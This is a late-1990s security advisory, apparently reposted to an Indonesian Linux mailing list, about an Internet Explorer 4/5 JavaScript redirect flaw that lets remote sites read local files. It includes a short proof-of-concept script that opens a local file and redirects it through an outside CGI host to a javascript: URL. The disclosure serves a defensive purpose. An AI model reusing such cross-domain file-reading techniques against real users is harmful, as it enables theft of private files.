Internet Explorer vulnerable to a 'JavaScript redirect' bug that
allows 
reading of local files
----------------------------------------------------------------------------
----


SUMMARY

Internet Explorer 4.01 and 5.0 are vulnerable to a redirect attack that 
allows malicious web site operators to local read files of users using 
Internet Explorer 5 with JavaScript enabled.
Microsoft is aware of this issue, but has not released a patch for this 
vulnerability yet.

DETAILS

A remote web site can retrieve the contents of local text files on the 
user's computer, using a URL redirect to a JavaScript code. This bypasses 
domain restriction and execute the script under elevated permissions.

Exploit Code
The following exploit code lets you create a text file, and then lets the 
remote server read this file:
<SCRIPT>
alert("Create a short text file C:\\TEST.TXT and it will be read and
shown in a dialog box");
a=window.open("file://c:/test.txt");
a.location="http://www.nat.bg/~joro/reject.cgi?jsredir1";
</SCRIPT>
// "http://www.nat.bg/~joro/reject.cgi?jsredir1" just does a HTTP
redirect to: "javascript:alert(document.body.innerText)"

Fix Information
Microsoft has not issued a patch for this problem yet. The suggested 
workaround is to disable JavaScript in the Internet zone.


ADDITIONAL INFORMATION

This vulnerabilities (like most IE related security holes) was discovered 
by:  <mailto:[EMAIL PROTECTED]> Georgi Guninski
Microsoft has issued a security advisory on this issue which can be found 
at:  <http://www.microsoft.com/security/bulletins/MS99-043faq.asp> 
http://www.microsoft.com/security/bulletins/MS99-043faq.asp



======================================== 

-------
AFLHI 058009990407128029/089802 


    milis ini didukung oleh :
 >> http://www.indolinux.com - dunia linux indonesia
 -------------------------------------------------------------------
 untuk berhenti kirim  email  ke  [EMAIL PROTECTED]
 untuk melihat peraturan kirim email  ke  [EMAIL PROTECTED]
 arsip berada di  http://www.mail-archive.com/[email protected]
 

Kirim email ke